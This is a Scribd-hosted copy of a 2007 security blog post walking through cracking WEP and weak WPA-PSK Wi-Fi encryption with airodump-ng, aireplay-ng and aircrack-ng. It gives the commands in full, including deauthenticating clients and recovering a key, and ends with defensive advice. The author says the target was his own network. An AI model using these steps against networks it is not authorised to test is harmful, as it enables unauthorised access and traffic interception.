Scribd Logo
Unggah

Selamat datang di Scribd!

  • Air Crack

    Diunggah oleh

    zennro
    124 tayangan5 halaman
    Air Crack

    Hak Cipta

    © Attribution Non-Commercial (BY-NC)

    Format Tersedia

    PDF, TXT atau baca online dari Scribd

    Apakah menurut Anda dokumen ini bermanfaat?

    Apakah konten ini tidak pantas?

    Laporkan Dokumen Ini
    Air Crack

    Hak Cipta:

    Attribution Non-Commercial (BY-NC)
    Unduh sebagai PDF, TXT atau baca online dari Scribd
    Tandai sebagai konten tidak pantas
    124 tayangan5 halaman

    Air Crack

    Diunggah oleh

    zennro
    Air Crack

    Hak Cipta:

    Attribution Non-Commercial (BY-NC)
    Unduh sebagai PDF, TXT atau baca online dari Scribd
    Tandai sebagai konten tidak pantas
    dari 5

    Syn: Breaking Encryption

    http://synjunkie.blogspot.ro/search/label/Breaking Encry...

    Distribuie

    Mai multe

    Urmtorul blog

    Creai blog

    Autentificare

    Syn
    Adventures of a Security Junkie

    Blog Archive
    2010 (8) 2009 (56) 2008 (51) 2007 (18)
    December (8) Fun with Tcpdump Stealing Cookies with WifiZoo Bypass Hidden SSID & MAC Address Filtering Wireless Network Penetration Protect Your PC for Free Basic Linux Commands What I'm Working On Wireless Fun For Bad People! November (4) October (6)

    Showing posts with label Breaking Encryption. Show all posts


    Sunday, December 23, 2007

    Wireless Network Penetration


    The purpose of this blog post is to list the tools used and steps followed for breaking into a wireless network protected with WEP or WPA-PSK encryption. Hopefully this blog post will help the reader recognise how trivial it is to bypass WEP encryption or WPA-PSK encryption protected with a weak password. The steps followed below and the tools used can also be employed to break WPA-PSK encryption that utilizes weak passwords or pass-phrases. I shall point out the changes necessary to break WPA-PSK where appropriate. The network that was penetrated in this example was my own network, however the encryption and setup were the same as what would usually be found on most wireless networks. Tools airodump-ng aireplay-ng aircrack-ng Wireless Assistant The Attack 1. I first run airodump-ng to identify the networks I can see. This also makes sure my card is configured correctly. airodump-ng wlan0

    Previous Entries
    Wifi Analyzer - Another Great Wardriving App Systray Recognition System A Little Forensics Goes A Long Way iPhone Wardriving with Wifi-Where Being a Part-Time Superman The Amazing Adventures of Bob Abusing VLANs With BackTrack Password Auditing with Fgdump, JTR & PowerShell Cisco Entries Getting Closer to God with Privilege Escalation Powershell vs Conficker Abusing Citrix USB Enumerator vs USB Hacksaw 10 Steps to Securing a Wireless Router More Iphone Wardriving Goodness The Story of an Newbie Hax0r Retrieving Citrix Session Stats with PowerShell The Story of an Insider Finding New Users with PowerShell The Story of a Hack Poor Mans Patching - PSExec & PowerShell SSH Tunneling the Pretty Way Incident Response - Finding Modified Files

    1 of 5

    10/01/2013 11:45 AM

    Syn: Breaking Encryption


    MetaSploit Payloads - msfpayload Why Physical Access Wins WAN Status with PowerShell Collecting Remote Volatile Data with PowerShell Wardriving with the IPhone Iphone Port scan Fun DNS Discovery With Fierce Log Parser Joy Hacktop Refresh - eeebuntu PowerShell - Finding Unused AD Accounts Scanning with MBSAcli Getting Started with PowerShell Network Mining Basic Packet Crafting with Hping Password Attacks in Windows Abusing Mail Servers SSH Tunneling Data Recovery & Deletion More Secure Web Browsing Netcat The Almighty Command-Line Ninjitsu Finding Traces of Executables Command-Line Kung Fu Metasploit Basics Password Attacks Remote Exploitation Free Internet Using ICMP Tunnels Creating Custom Password Lists Fun with Tcpdump Stealing Cookies Bypass Hidden SSID & MAC Address Filters Wireless Network Penetration Protect Your PC for Free Basic Linux Commands Wireless Fun Using & Abusing Alternate Data Streams Vulnerability Scanning Securing a Wireless Connection Hunting Malware E-mail Headers Port Scanning Forensics - Disk Imaging Anonymous Reconnaissance Arp Poisoning Forensics - Volatile Data Whats Coming!

    http://synjunkie.blogspot.ro/search/label/Breaking Encry...

    I see from the output that it correctly identifies my wireless network "joker" on channel 3 and provides the BSSID (we need this for later). If my card wasn't correctly set up (i.e in promiscous and in monitor mode) I could either run airmon-ng or set it up manually as detailed below: ifconfig ifconfig iwconfig ifconfig wlan0 wlan0 wlan0 wlan0 down promisc mode monitor up

    Then I would use ifconfig and iwconfig to make sure the settings were correct. 2. I now run airodump-ng with switches to tell it to only collect the Initialization Vectors (IV's) on channel 3 ad output it to a file using my wireless interface (wlan0) airodump-ng --ivs -c 3 -w wepdump wlan0

    Interesting Blogs\Sites
    Attack Vector A Day with Tape Packet Life aerokid240 Evil Fingers Room362 DarkOperator Terminal23 WWoIT

    2 of 5

    10/01/2013 11:45 AM

    Syn: Breaking Encryption


    GNUCitizen Carnal 0wnage McGrewSecurity IronGeek TaoSecurity ts/sci Security WindowsIR

    http://synjunkie.blogspot.ro/search/label/Breaking Encry...

    The result of this are 2 files, wepdump-01.txt & webdump-01.ivs. The .ivs file is the one I am interested in. When capturing data to break WPA-PSK do not use the --ivs switch. The entire packet needs to be captured. Another requirement packets to crack WPA-PSK is to force the client to re-associate with the AP. this can be done using the aireplay-ng tool and the following syntax: aireplay-ng -0 1 -a {AP BSSID} -c {client BSSID} wlan0 To obtain the AP & client BSSID's i use kismet, however this can be done with aireplay-ng. Check out the switches.

    Categories
    Backtrack (5) Bob Story (9) books (1) Breaking Encryption (1) CDP (1) Cisco (19) Citrix (6) Cyber-Fiction (12) Data-Recovery (1) Dos (2) eee (1) EIGRP (1) Encryption (1) Enumeration (2) Eventlogs (1) Forensics (11) Fun Stuff (5) Gaining Root (1) Google Hacking (1) Hiding Data (1) ICMP Fun (1) iphone (7) Kismet (1) Linux (1) Linux Commands (1) Log Parser (1) Malware (1) MBSA (1) Metasploit (5) NAT (1) Netcat (1) OSPF (1) Packet Crafting (1) Packet Sniffing (4) Password Audit (1) Password Cracking (4) Password Recovery (1) Patching (3) Penetration (1) Podcasts (4) Port Scanning (2) Port-Security (1) PowerShell (14) Privilege Escalation (1) RADIUS (1) Random Thoughts (1) Reconnaissance (4) RIP (1) Routing (3) Scanning (1) SMTP (1) SSH (3) Switch (2) Terminal Services (1)

    Note: when collecting the IV's having the best signal possible will speed things up.

    3.After 15 mins I stop the capture and run the collected IV's through aircrack-ng. I specify the BSSID in this command. aircrack-ng -b 00:18:F8:4B:43:86 wepdump-01.ivs

    As you can see it has decrypted the key as C3:C0:8C:90:3D If i was decrypting WPA-PSK i would need to specify a dictionary file containing the password with the -w switch. My syntax would therefor look like this: aircrack-ng -b 00:18:F8:4B:43:86 -w big-dictionary-file wpadump-01.cap

    4. I now reconfigure my wireless card to connect to the wireless network.

    3 of 5

    10/01/2013 11:45 AM

    Syn: Breaking Encryption


    Tools (2) Traffic Analysis (1) Tunneling (1) U3 (1) USB (1) User Security (1) VLAN (1) Web-Browsing (1) WiFi (11) WMIC (1)

    http://synjunkie.blogspot.ro/search/label/Breaking Encry...

    Security Podcasts
    Social Engineer Podcast Risky Business Crypto-Gram Paul Dot Com Security Now! Inside The Core CyberSpeak Tenable Podcast Social Media Security Eurotrash Security Security Justice Exotic Liability Securabit AudioParasitics Sophos Podcast CERT Podcast Silver Bullet Podcast PLA Hak.5 MightySeek

    Currently the card is in monitor mode so I reconfigure it using the following commands: ifconfig wlan0 down ifconfig wlan0 -promisc iwconfig wlan0 managed ifconfig wlan0 up Once reconfigured I quickly check I can see the target network using: iwlist scan

    SynJunkie Followers
    Join this site
    with Google Friend Connect

    5. I now use the Wireless Assistant to connect the target network with the key.

    Members (131) More

    About SynJunkie
    View my complete profile

    6. After Connecting to the target network I check my network & wireless settings and test connectivity to the web.

    4 of 5

    10/01/2013 11:45 AM

    Syn: Breaking Encryption

    http://synjunkie.blogspot.ro/search/label/Breaking Encry...

    Now I have an IP on this network I can either use this network connection to access the Internet or to perform further attacks against hosts on the wireless network or I could capture the web traffic and do interesting things with that.

    Conclusion WEP encryption is very broken. Only use as a last resort, and if no other encrytion is available. If you do need to use WEP use additional layers of security to protect your network further such as MAC Address Filtering, Hidden SSID, Fixed IP's or a limited DHCP scope. These additional measures can all be bypassed but they make the attackers job that little bit harder.

    Thanks to the guys at Remote Exploit for putting together BackTrack. BackTrack3 Kicks Ass!!!

    Links Cracking WPA-PSK Video Cracking WEP with no clients


    Posted by SynJunkie 0 comments Labels: Breaking Encryption, WiFi

    Home Subscribe to: Posts (Atom)

    Older Posts

    5 of 5

    10/01/2013 11:45 AM

    Anda mungkin juga menyukai